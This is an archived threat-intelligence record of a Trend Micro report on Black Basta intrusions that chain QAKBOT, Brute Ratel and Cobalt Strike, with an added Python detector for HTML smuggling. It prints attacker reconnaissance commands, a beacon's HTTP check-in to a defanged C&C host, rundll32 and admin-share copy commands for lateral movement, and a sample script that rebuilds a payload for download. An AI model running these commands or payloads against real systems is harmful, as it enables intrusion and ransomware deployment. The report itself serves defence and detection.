{
	"id": "920ef4b4-47d2-4b09-b0ca-dd7f9fb89e9f",
	"created_at": "2026-04-06T02:12:06.762927Z",
	"updated_at": "2026-04-10T03:24:24.157801Z",
	"deleted_at": null,
	"sha1_hash": "743814c804450067041e2596ceeffcb16d3158c2",
	"title": "Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 76722,
	"plain_text": "Black Basta Ransomware Gang Infiltrates Networks via QAKBOT,\r\nBrute Ratel, and Cobalt Strike\r\nBy Ian Kenefick, Lucas Silva, Nicole Hernandez\r\nPublished: 2022-10-12 · Archived: 2026-04-06 01:37:02 UTC\r\nThe rise of Brute Ratel and other C\u0026C frameworks\r\nBrute Ratel is a commercial (paid) adversary emulation framework and a relative newcomer to the commercial C\u0026C framework space, where it competes with more established players such as Cobalt Strike.\r\nAdversary emulation frameworks like Brute Ratel and Cobalt Strike are marketed to penetration testing professionals (red teams) for use in legitimate engagements in which organizations seek to improve their ability to detect and respond to real cyberattacks. These frameworks provide hands-on-keyboard access from remote locations to emulate the tactics, techniques, and procedures (TTPs) used by attackers in network intrusions.\r\nOn top of Cobalt Strike’s legitimate use cases, it has gained notoriety for its illicit usage and near omnipresence in high-profile, human-operated ransomware attacks during the past few years. It serves as a common second-stage payload from botnets such as QAKBOT (TrojanSpy.Win64.QAKBOT), IcedID (TrojanSpy.Win64.ICEDID), Emotet (TrojanSpy.Win64.EMOTET), and Bumblebee (Trojan.Win64.BUMBLELOADER), among others. Unfortunately, several versions of Cobalt Strike have been leaked over the past couple of years, accelerating its malicious use by cybercriminals.\r\nBecause Cobalt Strike is so much more widely used than Brute Ratel, detection coverage for it is also far greater than for the latter. 
This makes Brute Ratel and other less established C\u0026C frameworks an increasingly attractive option for malicious actors, whose activities may remain undetected for longer.\r\nBrute Ratel has recently attracted greater interest from threat actors in the cybercriminal underground, where versions of the framework are actively traded and cracked versions circulate. It is unknown how Brute Ratel was initially leaked, but its developers have acknowledged the leak on Twitter.\r\nQAKBOT ‘BB’ to Brute Ratel\r\nThe campaign commences with a spam email, sent to potential victims, that contains a newly registered malicious URL. The landing page behind the URL presents the recipient with a password for a ZIP file.\r\nSandbox and security solution evasion\r\nThe use of password-protected ZIP files at this stage is likely an attempt to evade analysis: a mail gateway or sandbox that cannot open the archive cannot scan its contents, while the recipient, who has the password, can.\r\nMark of the Web evasion\r\nThe ZIP file contains a single .ISO file. The use of an ISO file is an attempt to defeat the “Mark of the Web (MOTW),” the Zone.Identifier alternate data stream that Windows attaches to files downloaded from the internet and that triggers additional security measures, such as SmartScreen checks, in Windows and endpoint security solutions. At the time of this campaign, files launched from a mounted ISO image did not inherit that stream, so the LNK inside the image ran without those checks.\r\nThe ISO file contains a visible LNK file that uses the “Explorer” icon and two hidden subdirectories, each containing various files and directories. By default, Windows does not display hidden files to the user. 
Figure 5 illustrates what the user sees when the “Show hidden files” setting is enabled.\r\nThe directory structure is as follows:\r\nFile Name | Description | Detection Name | SHA-256 (truncated in this copy)\r\nAccounting#7405.iso | ISO image carrying the files below | Trojan.Win32.QAKBOT.YACIW | 582a5e2b2652284ebb486bf6a367aaa6bb817c856f08ef54db64\r\nContract.lnk | LNK file | Trojan.LNK.QAKBOT.YACIW | e9e214f7338c6baefd2a76ee66f5fadb0b504718ea3cebc65da7a\r\nfodder.txt | Decoy text file | - | 4dcf06a5afc699bbb73650cefe4ad86a1b686a257c607e0b96dd\r\nenunciatedNaught.cmd | Malicious CMD file | Trojan.BAT.QAKBOT.YACIW | d44b05b248f95986211ab3dc2765f1d76683594a174984c8b80\r\neyelid.png | Decoy PNG file | - | dd755395b36acfceaa0d7e9c5479df4b1c919d57837fe4306898\r\nreflectiveness.db | QAKBOT DLL | Trojan.Win32.QAKBOT.YACIW | 01fd6e0c8393a5f4112ea19a26bedffb31d6a01f4d3fe5721ca20\r\nsharpOutvotes.js | Malicious JS file | Trojan.JS.QAKBOT.YACIW | 06c4c4d100e9a7c79e2ee8c4ffa1f7ad165a014f5f14f90ddfc730\r\nhttps://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\r\nPage 1 of 8\r\nCommand-line interface - Execution sequence\r\nQAKBOT uses obfuscation across two script files, a JavaScript (.js) file and a batch script (.cmd) file, likely in an effort to conceal suspicious-looking command lines. The visible LNK starts the chain, the .cmd and .js scripts stage each other, and the QAKBOT DLL, stored with a .db extension, is finally loaded by a Windows DLL host (the TTP table below lists regsvr32.exe). A DLL host being handed a file whose extension is not .dll is the one element of this chain that does not depend on the file names, which change with every distribution.
\r\nInitial QAKBOT C\u0026C server communication\r\nThe C\u0026C infrastructure is geographically distributed across compromised hosts residing predominantly in residential Internet Service Provider (ISP) broadband networks.\r\nThe C\u0026C servers reside in the following countries:\r\nAfghanistan\r\nAlgeria\r\nArgentina\r\nAustria\r\nBrazil\r\nBulgaria\r\nCanada\r\nChile\r\nColombia\r\nEgypt\r\nIndia\r\nIndonesia\r\nJapan\r\nMexico\r\nMongolia\r\nMorocco\r\nNetherlands\r\nQatar\r\nRussia\r\nSouth Africa\r\nTaiwan\r\nThailand\r\nTurkey\r\nUnited Arab Emirates\r\nUnited Kingdom\r\nUnited States\r\nVietnam\r\nYemen\r\nThese ‘Tier 1’ C\u0026C servers are considered disposable by the QAKBOT operators and are replaced frequently (nearly every time there is a new distribution of the malware), though some persist across multiple QAKBOT malware configurations. Because they are compromised residential hosts, blocking on IP address alone has a short shelf life; the durable signal is the pattern of a workstation talking to residential broadband addresses abroad rather than any particular address.\r\nAutomated reconnaissance commands\r\nJust six minutes after the initial C\u0026C communication, with QAKBOT now running inside an injected process (wermgr.exe, the Windows Error Reporting manager), automated reconnaissance of the infected environment is performed by executing multiple built-in command-line tools. 
The execution of these command lines is in the following order:\r\nOrder | Process | Command Line\r\n1 | C:\\Windows\\SysWOW64\\net.exe | net view\r\n2 | C:\\Windows\\SysWOW64\\ARP.EXE | arp -a\r\n3 | C:\\Windows\\SysWOW64\\ipconfig.exe | ipconfig /all\r\n4 | C:\\Windows\\SysWOW64\\nslookup.exe | nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.\u003cdomain_fqdn\u003e\r\n5 | C:\\Windows\\SysWOW64\\net.exe | net share\r\n6 | C:\\Windows\\SysWOW64\\ROUTE.EXE | route print\r\n7 | C:\\Windows\\SysWOW64\\NETSTAT.EXE | netstat -nao\r\n8 | C:\\Windows\\SysWOW64\\net.exe | net localgroup\r\n9 | C:\\Windows\\SysWOW64\\whoami.exe | whoami /all\r\nTwo details help detection: the tools run from SysWOW64 because the injected wermgr.exe is 32-bit (file system redirection points a 32-bit process at the 32-bit tools), and the nslookup query for the _ldap._tcp.dc._msdcs SRV record is a domain controller lookup that an error-reporting process has no reason to make. This activity is visible in Trend Micro Vision One™, which detects the suspicious usage of these built-in Windows commands.\r\nQAKBOT drops Brute Ratel\r\nFive minutes after the automated reconnaissance completes, the QAKBOT-injected wermgr.exe process drops the Brute Ratel DLL and invokes it via a rundll32.exe child process, calling the DLL’s “main” export.\r\nThe backdoor communicates over HTTPS and checks in with the Brute Ratel server at symantecuptimehost[.]com, a domain named to pass as security-vendor traffic:\r\nPOST hxxps://symantecuptimehost[.]com:8080/admin.php?login= HTTP/1.1\r\nContent-Type: application/json\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\r\nHost: symantecuptimehost[.]com:8080\r\nContent-Length: 122\r\nCache-Control: no-cache\r\nThe port (8080), the path (admin.php?login=) and the fixed Chrome 90 user agent are the parts of this check-in worth a network signature, but all three are operator-configurable, so they identify this campaign rather than Brute Ratel in general.\r\nFurther reconnaissance is performed in the environment to identify privileged users. 
First, the built-in net.exe and nltest.exe are used.\r\nOrder | Process | Command Line\r\n1 | C:\\Windows\\SysWOW64\\net.exe | net group \"Domain Admins\" /domain\r\n2 | C:\\Windows\\SysWOW64\\net.exe | net group \"Domain Controllers\" /domain\r\n3 | C:\\Windows\\SysWOW64\\nltest.exe | nltest /domain_trusts /all_trusts\r\n4 | C:\\Windows\\SysWOW64\\net.exe | net user \u003credacted\u003e /domain\r\nSecond, SharpHound, the BloodHound collector, is run via Brute Ratel inside an injected svchost.exe process. It writes JSON files describing the Active Directory organisational units, Group Policy objects, domains, groups, computers and users, which are then ingested into BloodHound to map paths to privileged accounts. The files are packed into a ZIP file in preparation for exfiltration. The entire process is scripted and takes less than two seconds to complete.\r\nBrute Ratel drops Cobalt Strike\r\nInterestingly, the actors chose to leverage Cobalt Strike for lateral movement. 
The first of several beacon files are dropped onto the same infected endpoint running Brute Ratel C4, the first being:\r\nC:\\Users\\Public\\Name-123456.xls\r\nDespite its .xls extension this file is a DLL; it is executed on the same host with the following command:\r\nrundll32 C:\\users\\public\\Name-123456.xls,DllRegisterServer\r\nThe actor drops the other beacon files and copies them to administrative shares on other hosts on the network, again using file names with an .xls extension:\r\nC:\\Users\\Public\\abcabc.xls\r\nC:\\Users\\Public\\abc-1234.xls\r\nC:\\Users\\Public\\Orders_12_34_56.xls\r\nC:\\Users\\Public\\MkDir.xls\r\nThe commands used to copy the files are as follows:\r\nC:\\WINDOWS\\system32\\cmd.exe /C copy C:\\users\\public\\fksro.xls \\\\\u003cHOST\u003e\\C$\\users\\public\\abcabc.xls\r\nThe beacon C\u0026C servers are:\r\nhxxps://fewifasoc[.]com | 45.153.242[.]251\r\nhxxps://hadujaza[.]com | 45.153.241[.]88\r\nhxxps://himiketiv[.]com | 45.153.241[.]64\r\nThe threat actors were then evicted from the environment before any final actions could be taken. Based on the level of access and the discovery activity, we assess that the likely final action would have been a domain-wide ransomware deployment.\r\nQAKBOT ‘Obama’ to Brute Ratel\r\nIn another, more recent incident, Trend Micro Research spotted QAKBOT using the “Obama” distributor ID prefix (for example “Obama208”) also dropping Brute Ratel C4 as a second-stage payload.\r\nIn this case, the malware arrives as a password-protected ZIP file delivered via HTML smuggling: the encoded payload is embedded in a script inside an HTML attachment or web page, and once the user opens the HTML page in the browser, the script decodes and assembles the payload locally and offers it as a download, so no recognisable archive crosses the mail gateway. 
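As an added example that is not part of the Trend Micro write-up, the Python below does what a mail-gateway or sandbox analyst has to do with such an attachment: find the base64 blob the script decodes, decode it the way the browser would, identify the rebuilt payload by its magic bytes and, when it is a ZIP, list the entry names together with their encryption flag. Entry names are readable even when the archive is password protected, because ZIP encrypts only entry data, so a disk image such as an .iso inside the archive can be flagged without knowing the password. The sample HTML, its script, the archive password and the placeholder ISO content are all constructed for this example; only the file name Accounting#7405.iso is taken from the first kill chain above.

```python
import base64
import binascii
import io
import re
import zipfile

# Constructed sample: an HTML attachment that rebuilds a ZIP in the browser and triggers a download.
# The ZIP holds placeholder bytes in place of the campaign's ISO; nothing here is the original lure.
def build_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        z.writestr('Accounting#7405.iso', b'placeholder bytes standing in for an ISO image')
    return buf.getvalue()

SAMPLE_HTML = '''<html><body>
<p>Your document is ready. Archive password: 1234</p>
<script>
var data = '%s';
var bytes = Uint8Array.from(atob(data), function (c) { return c.charCodeAt(0); });
var blob = new Blob([bytes], {type: 'application/octet-stream'});
var a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = 'Accounting#7405.zip';
a.click();
</script>
</body></html>''' % base64.b64encode(build_sample_zip()).decode('ascii')

# JavaScript primitives that turn an inline string into a downloaded file
DOWNLOAD_PRIMITIVES = ('atob(', 'new Blob(', 'createObjectURL', 'msSaveOrOpenBlob', '.download')
B64_BLOB = re.compile('[A-Za-z0-9+/]{40,}={0,2}')
MAGIC = {b'PK' + bytes([3, 4]): 'zip', b'MZ': 'pe', b'%PDF': 'pdf', bytes([0x1f, 0x8b]): 'gzip'}
CONTAINER_EXTS = ('.iso', '.img', '.vhd', '.vhdx')   # disk images used to sidestep Mark of the Web

def identify(payload):
    for magic, kind in MAGIC.items():
        if payload.startswith(magic):
            return kind
    if payload[32769:32774] == b'CD001':             # ISO 9660 volume descriptor sits at sector 16
        return 'iso9660'
    return 'unknown'

def zip_listing(payload):
    # entry names and the encryption flag are readable without the password: ZIP encrypts entry data only
    with zipfile.ZipFile(io.BytesIO(payload)) as z:
        return [(info.filename, bool(info.flag_bits & 0x1)) for info in z.infolist()]

def scan_html(html):
    primitives = [p for p in DOWNLOAD_PRIMITIVES if p in html]
    payloads = []
    for m in B64_BLOB.finditer(html):
        try:
            payload = base64.b64decode(m.group(0), validate=True)
        except binascii.Error:
            continue                                   # long base64-looking text that is not a blob
        kind = identify(payload)
        finding = {'offset': m.start(), 'size': len(payload), 'kind': kind, 'entries': [], 'containers': []}
        if kind == 'zip':
            try:
                finding['entries'] = zip_listing(payload)
            except zipfile.BadZipFile:
                finding['kind'] = 'zip-truncated'
            finding['containers'] = [n for n, _ in finding['entries'] if n.lower().endswith(CONTAINER_EXTS)]
        payloads.append(finding)
    smuggling = bool(primitives) and any(p['kind'] != 'unknown' for p in payloads)
    return {'verdict': 'html-smuggling' if smuggling else 'clean', 'primitives': primitives, 'payloads': payloads}

if __name__ == '__main__':
    print(scan_html(SAMPLE_HTML))
```

The verdict needs both halves: a decodable blob with a recognised file type and a script that hands it to the browser as a download. Either alone is common in legitimate mail (inline images are base64, and plenty of pages call atob), which is why the two signals are combined rather than alerted on separately.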
\r\nOnce the ZIP file is decrypted using the password provided in the HTML attachment, the user is presented with an ISO file. The malicious files are contained in the ISO file, which is again used as a Mark of the Web bypass. The ISO file has the following directory structure:\r\nSince QAKBOT’s return, we have observed multiple variations in the execution chain, from scripting languages to file extensions and the use of export function names and ordinals. For this infection, the following variation was used:\r\nThe infection plays out with the same TTPs (Tactics, Techniques, and Procedures) described for the first kill chain in this blog. However, one notable difference was observed in the C\u0026C configuration, which used DNS over HTTPS (DoH) rather than the more traditional HTTPS C\u0026C channel seen in the first incident. The C\u0026C servers observed used HTTPS with Let’s Encrypt certificates.\r\nWith DoH, the DNS queries for the C\u0026C domains travel inside HTTPS requests to a DoH resolver, so they never appear on the network as plain DNS. If SSL/TLS traffic is not being inspected using man-in-the-middle (MitM) techniques, those DNS queries to the C\u0026C server will go unnoticed. What remains visible is a TLS session from the infected host to the DoH endpoint, so where inspection is not in place the practical controls are to restrict outbound DoH to approved resolvers and to alert on processes other than the browser or the system resolver talking to DoH endpoints.\r\nBased on our investigations, we can confirm that the QAKBOT-to-Brute Ratel-to-Cobalt Strike kill chain is associated with the group behind the Black Basta ransomware. This is based on overlapping TTPs and infrastructure observed in Black Basta attacks. It is not the first time that we have observed intrusions via QAKBOT leading to Black Basta.\r\nConclusion and security recommendations\r\nUsers can thwart new QAKBOT variants and other threats that spread through email by following these best practices:\r\nVerify the email sender and content before downloading attachments or selecting embedded links.\r\nHover the pointer over embedded links to show the link’s target.\r\nCheck the sender’s identity. 
Unfamiliar email addresses, mismatched email and sender names, and spoofed company emails are some of the signs that the sender has malicious intent.\r\nIf the email claims to come from a legitimate company, verify with that company that it actually sent the message before taking any action.\r\nOrganizations should take note of the trending use in attacks of Cobalt Strike, living-off-the-land binaries (LOLBins), and red team or penetration-testing tools such as Brute Ratel C4, all chosen to blend in with the environment.\r\nUsers can also protect systems through managed detection and response (MDR), which uses advanced artificial intelligence to correlate and prioritize threats and determine whether they are part of a larger attack. It can detect threats before they are executed, preventing further compromise.\r\nThe constant resurgence of new, more sophisticated variants of known malware, as well as the emergence of entirely unknown threats, demands solutions with advanced detection and response capabilities such as Trend Micro Vision One™, a platform that provides XDR capabilities to collect and automatically correlate data across multiple security layers, from email and endpoints to servers, cloud workloads, and networks. Trend Micro Vision One can prevent attacks via automated protection, while also ensuring that no significant incidents go unnoticed.\r\nTactics, Techniques, and Procedures (TTPs)\r\nTactic / Technique | Notes\r\nTA0001 Initial Access\r\nT1566.001 Phishing: Spearphishing Attachment | Victims receive spear-phishing emails with an attached malicious ZIP file, typically password protected, or an HTML file. 
That file contains an ISO file.\r\nT1566.002 Phishing: Spearphishing Link | QAKBOT has spread through emails with newly created malicious links.\r\nTA0002 Execution\r\nT1204.001 User Execution: Malicious Link | QAKBOT has gained execution through users accessing malicious links.\r\nT1204.002 User Execution: Malicious File | QAKBOT has gained execution through users opening malicious attachments.\r\nT1569.002 System Services: Service Execution | Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use the Service Control Manager to start new services.\r\nT1059.005 Command and Scripting Interpreter: Visual Basic | QAKBOT can use VBS to download and execute malicious files.\r\nT1059.007 Command and Scripting Interpreter: JavaScript | QAKBOT abuses wscript.exe to execute a JScript file.\r\nTA0003 Persistence\r\nT1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | QAKBOT can maintain persistence by creating an auto-run Registry key.\r\nTA0004 Privilege Escalation\r\nT1055 Process Injection | QAKBOT can inject itself into processes such as wermgr.exe.\r\nTA0005 Defense Evasion\r\nT1027.006 Obfuscated Files or Information: HTML Smuggling | Smuggles a file’s content by hiding malicious payloads inside seemingly benign HTML files.\r\nT1218.010 System Binary Proxy Execution: Regsvr32 | QAKBOT can use regsvr32.exe to execute malicious DLLs.\r\nT1218.011 System Binary Proxy Execution: Rundll32 | Cobalt Strike can use rundll32.exe to load a DLL from the command line.\r\nT1140 Deobfuscate/Decode Files or Information | The initial QAKBOT .zip file bypasses some antivirus detections because it is password protected.\r\nT1562.009 
Impair Defenses: Safe Mode Boot | Black Basta uses bcdedit to boot the device in safe mode.\r\nTA0007 Discovery\r\nT1010 Application Window Discovery | QAKBOT can enumerate windows on a compromised host.\r\nT1482 Domain Trust Discovery | QAKBOT can run nltest /domain_trusts /all_trusts for domain trust discovery.\r\nT1135 Network Share Discovery | QAKBOT can use net share to identify network shares for use in lateral movement.\r\nT1069.001 Permission Groups Discovery: Local Groups | QAKBOT can use net localgroup to discover local groups.\r\nT1057 Process Discovery | QAKBOT has the ability to check running processes.\r\nT1018 Remote System Discovery | QAKBOT can identify remote systems through the net view command.\r\nT1082 System Information Discovery | QAKBOT can collect system information including the OS version and domain on a compromised host.\r\nT1016 System Network Configuration Discovery | QAKBOT can use net config workstation, arp -a, and ipconfig /all to gather network configuration information.\r\nT1049 System Network Connections Discovery | QAKBOT can use netstat to enumerate current network connections.\r\nT1033 System Owner/User Discovery | QAKBOT can identify the username on a compromised system.\r\nTA0008 Lateral Movement\r\nT1021.002 Remote Services: SMB/Windows Admin Shares | Cobalt Strike can use Windows admin shares (C$ and ADMIN$) for lateral movement.\r\nTA0011 Command and Control\r\nT1071.001 Application Layer Protocol: Web Protocols | QAKBOT can use HTTP and HTTPS in communication with the C\u0026C servers.\r\nT1573 Encrypted Channel | Used by QAKBOT, Brute Ratel and Cobalt Strike.\r\nTA0040 Impact\r\nT1486 Data Encrypted for Impact | Black Basta uses the ChaCha20 algorithm to encrypt files. 
The ChaCha20 encryption key is then encrypted with an RSA-4096 public key embedded in the executable, so files cannot be recovered without the operator’s private key.\r\nT1489 Service Stop | Uses sc stop and taskkill to stop services.\r\nT1490 Inhibit System Recovery | Black Basta deletes Volume Shadow Copies using the vssadmin tool.\r\nT1491 Defacement | Replaces the desktop wallpaper to display the ransom note.\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nSource: https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html"
	],
	"report_names": [
		"black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775441526,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/743814c804450067041e2596ceeffcb16d3158c2.pdf",
		"text": "https://archive.orkl.eu/743814c804450067041e2596ceeffcb16d3158c2.txt",
		"img": "https://archive.orkl.eu/743814c804450067041e2596ceeffcb16d3158c2.jpg"
	}
}